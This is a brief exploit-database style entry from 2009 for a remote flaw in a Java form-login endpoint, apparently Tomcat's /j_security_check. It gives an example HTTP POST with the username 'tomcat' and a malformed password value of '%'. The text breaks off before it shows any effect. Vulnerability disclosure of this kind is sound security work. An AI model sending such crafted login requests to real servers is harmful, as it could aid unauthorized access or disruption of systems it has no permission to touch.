Author: D. Matscheko type: remote platform: multiple port: date_added: 2009-11-08 date_updated: verified: 1 codes: tags: aliases: screenshot_url: application_url:
Attackers can use readily available tools to exploit this issue. The following example POST data is available: POST /j_security_check HTTP/1.1 Host: www.example.com j_username=tomcat&j_password=%